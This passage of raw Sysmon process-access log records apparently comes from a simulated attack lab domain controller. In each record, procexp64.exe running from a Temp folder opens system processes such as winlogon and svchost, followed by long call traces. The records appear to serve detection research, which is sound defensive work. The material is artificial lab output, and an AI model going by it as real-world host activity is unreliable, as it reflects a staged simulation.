Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\